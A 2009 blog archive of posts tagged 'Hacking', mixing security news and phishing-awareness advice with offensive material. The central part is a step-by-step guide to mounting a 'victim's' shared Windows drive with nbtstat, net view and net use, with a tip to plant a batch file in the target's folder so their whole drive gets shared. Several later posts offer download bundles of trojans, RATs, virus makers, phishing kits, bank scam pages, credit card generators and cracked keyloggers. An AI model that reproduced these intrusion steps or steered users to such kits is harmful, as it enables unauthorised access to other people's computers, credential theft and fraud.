Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Friday, June 26, 2009

Gmail Account Hacking Tool

A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.

When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.

Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.

The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”

If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

Tuesday, May 12, 2009

How to access a folder or hardrive on a computer/pc on your network.

The following article explains the method used by most hackers to access someones computer/hard disk remotely using command prompt in your network ie network computer hacking.

Step 1
Get a good IP scanner angry ip scanner is a good one you can get it here: http://www.angryziber.com/ipscan/



Step 1
Get a good IP scanner angry ip scanner is a good one you can get it here: http://www.angryziber.com/ipscan/

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:\windows>net view \\255.255.255.255

if the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive.

c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.



Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

Monday, May 4, 2009

Know the Ethics and Learn Computer Hacking

By: Rose Mathew

Internet has become a bandwagon of entertainment, education and business. It beats tradition mediums in terms of the benefits it offers. But unfortunately there is much scope of anonymity/privacy on the web and helps the cyber terrorists prey up on the internet resources. That’s why, it is encouraged to learn computer hacking to counter the actions of unethical hackers (also known as black hats).

Hacking is a fraudulent act that is illegal in some ways and helpful in others. It is to know the programmable systems and how they work in a network. An ethical hacker shows the downfalls in the security system of an organization so they can improve it. Today hacking has become an art and very popular that hackers have formed groups and even have conferences together to share their knowledge. Hacking for whatever the purpose, good or bad, requires knowledge and much programming skills. An intelligent programmer can be a good ethical/unethical hacker. These days "hacker" is being used as a term for expert, intelligent and creative people. Let’s discuss how to learn computer hacking:


10 Tips to Learn Computer Hacking

As told before, professional hackers are generally more intelligent than any average programmer. So becoming a hacker depends a lot on one’s intelligence and efforts. However, the following tips will help you learn computer hacking in a systematically.
  1. Be curious: Curiosity is the mother of hacking. Look under the hood. Take things apart. Know the details of your system directories, file systems, system files. Look inside your computer.

  2. Read a lot: Buy lots of books, go through the tutorials. Read the help files on your system. If you are using Linux/Unix read the man files.

  3. Experiment: Take precautions and experiment whatever you read. Apply to work the idea that just hit your mind. Don't be afraid to change things. Doing this for a long time will give you much idea on the computer hardware and the operating system. Try using command options and switches. Tweak the registry and see what happens. Change settings in .INI files. In Linux/Unix, visit the directories where you normally don’t need to go.

  4. Make backups: If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer.

  5. Think out of box: Hacking is not restricted to computers only. You can try trick on other networks also like mobile, telephone, etc.

  6. Get some real tools: You can find numerous hacking tools on the net. Though some serious tools are not available for free, you need to have some Hex file editors, Snoopers, Compilers and APIs. In addition you also need Scripting tools, Disk editors/formatters and Disassemblers.

  7. Learn to program: Serious ethical hackers are always very good programmers. If you want to be a hacker, you're going to learn much programming. You should also be quite familiar with the popular operating systems like Windows, Linux, Unix, OS2 etc. Of course, the choice of language depends on you. In Unix and Unix-like OS (Linux, Free BSD) Perl is very good to start with. Use VB or Java to program in Windows. Which ever platform you use, you need to learn considerable C/C++. You should know more than one language because no one language is right for every task.

  8. Discuss with peers: In isolation, you can’t learn anything. You need to take classes, join users groups and computer clubs. Talking to people on IRC or other chat programs proves really helpful. Share what you learn. Because to get something you have to give some.

  9. Do some projects: Pick some projects and work consistently until you've finished them. Real time experience is better than reading. Build from ground zero, learn to create icons, associate it with some files, read how the search engines search, try to manipulate the programs that you use daily.

  10. Use the Internet: There is no source greater than the Internet. Start with the Web. Learn how to use Boolean searches. Bookmark all those sites which you find worth visiting. Sometimes you will find useful information at the most strangest places.


Detailed Courses of Study to Learn Hacking
  • Techniques: Windows Hacking, Registries Editing, Password cracks, Google hacking, Computer Forensics, Firewalls, Network Hacking, Security tools, Hacking tools, Encryption, Email tracking, Router Hacking, Email Forging, Port Scanning , MAC Address Spoofing, Proxies etc.

  • Tools: Key loggers, Anti Key Loggers, Firewalls, MAC Address Spoofing, Proxy Bouncing tools, Network Scanners like IPscan, Sniffers, Spyware and Trojan Detectors, Information Gathering Tools, Remote Administration Tools, Computer Forensics Tools, Steganography tools and a lot more.

  • Games: Hacking Simulation Games to understand the world of hacking and provides you with the opportunity to practice hacking without the danger of getting caught

10 Commandments of Ethical Hacking
  1. Don’t a computer to harm other people.

  2. Don’t interfere with other people's computer work.

  3. Don’t snoop around in other people's computer files.

  4. Don’t use a computer to steal.

  5. Don’t use a computer to bear false witness.

  6. Don’t copy or use proprietary software for which you have not paid.

  7. Don’t use other people's computer resources without authorization or compensation.

  8. Don’t appropriate other people's intellectual output.

  9. Think about the social consequences of the program you are writing.

  10. Always use a computer in ways that insure consideration and respect for your fellow humans.

Saturday, May 2, 2009

Hacker's Tool Set (45 Hacking Tools)

Hacker's Tool Set (45 Hacking Tools)

Hacker's Tool Set (45 Hacking Tools)


Features:
• IMC Grahams Trojan
• IMC Ice Dragon
• Myspace Password Cracker
• IMC Myspace Phisher
• Ultra Surf
• Rapid Share *** Gen
• MSN Nudge Madness
• Ice Reloaded MSN Freezer
• IMC Handbook
• BrutusAE2
• Lord PS
• Hoax Toolbox
• IMC Word List
• Blues Port Scanner
• Bandook RAT v1.35
• Project Satan 2.0
• EES binder v1.0
• File Injector v3
• Remote Desktop Spy v4.0
• Passive Terror v1.3 Final Edition
• Dyn-DL (Dynamic downloader)
• Silent Assassin v2.0
• Net Scan Tools v4.2
• Rocket v1.0
• NStealth HTTP Security Scanner v5.8
• Attack Toolkit v4.1 & source code included
• Legion NetBios Scanner v2.1
• Battle Pong
• TeraBIT Virus Maker v2.8
• p0kes WormGen 2.0
• JPS Virus Maker
• IRC Ban Protection
• IRC Mega Flooder
• FTP Brute Hacker
• RAR Password Cracker
• Vbulletin 3.6.5 Sql Injection Exploit
• IPB 2-2.1.5 Sql Injection Exploit
• IPB 2-2.1.7 Exploit
• Cain & Abel v4.9.3
• NetStumbler 0.4.0
• Cryptor 1.2
• VNC Crack
• Hamachi 0.9.9.9
• pbnj-1.0
• Mutilate File Wiper 2.92
• and many more...

Download Link:
US, EU, RU and Canada Download from Uploading
Download Here

PHI and Rest of the World Download from Good
Download Here

All-In-One Ultra Hacker

This is a package of tons and tons of hacking tools(more than 100!)...Its better to freeze your pc with deep freeze while using this and unfreeze while you dont you this tool.As this tool contains a lot and lot of hacker tools,your Anti-virus may detect it as a virus.Dont Panic!

found this AIO did download just posting
This AIO is with viruses cos these are hacking tools and AV detect as viruses!
I think it's better to use deep freeze and than u can freeze ur pc when u use this tools and than u can unfreeze it when u don't use !


Includes:

AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
~Censored~ Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
~censored~.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip



Download

All-In-One Ultra Hacker (2008)

8 in 1 Keylogger with Cracks

  • Sureshot Ghost Keylogger v.3.80
  • Quick Keylogger 2.1.027
  • Embrace
  • Family Key Logger
  • Easy Keyboard Logger v.1.0
  • Blazingtools Perfect Keylogger v.1.6.2.0
  • Ardamax Keylogger v.1.9


Free Download

Download8 in 1 Keylogger with Cracks


Password:ghanshyam_thori

Facebook Hit by Second Phishing Scam in Two Days


The more popular something is, the more people want to use it as a way to scam people. An example would be the recent swine flu related spam attacks, and these are phishing scams that sends Facebook users to fake login sites (today fbstarter.com, yesterday fbaction.net).

While fbaction.net has been taken down, go to fbstarter.com and it com sure looks like a lot like some sort of Facebook login page, doesn't it (see attached pic)?

What's happening is people are getting "Facebook messages" supposedly from other users that basically just say "Look at this" and have the link that takes them to fbstarter.com. Once you enter your username / password there, you've basically delivered your login credentials to the scammer.

Now, fbstarter.com sure looks suspiciously like fbaction.net. Personally, if you're alert to the important aspects of watching out for phishing, such as:

  • Don't use links delivered in emails or IM to login to any site
  • If you do, make sure the site's URL looks like what you are expecting
  • Email the site / organization / business in question if you are unsure
then you should be pretty safe.

Of course, while some (not me) store credit cards information in their Facebook account, most of the information for a credit card is redacted anyway (though I suppose a scammer could use your credit card to buy something on the site).

The main reason, I would think, that scammers would want your login info is because many people use the same login info everywhere. Definitely a bad idea, but something many people do.

If you've fallen for either of these phishing scams already, change your Facebook password immediately (if the scammers haven't already locked you out). And, if that's happened and it's the same password you use for your Amazon.com, eBay, or other types of accounts, you could be in big trouble.

Interested in learning about avoiding phishing scams? I wrote earlier about a free online game developed by Carnegie-Mellon that teaches how to avoid it.

Call phones from Gmail- Calls from PC to Phone with Google Talk ~~~~ Now in India ~~~~

Free International Calls from PC to Phone with Google Talk and Talkster (GTalk-to-VoIP) Google has officially unveiled its new Google Mai...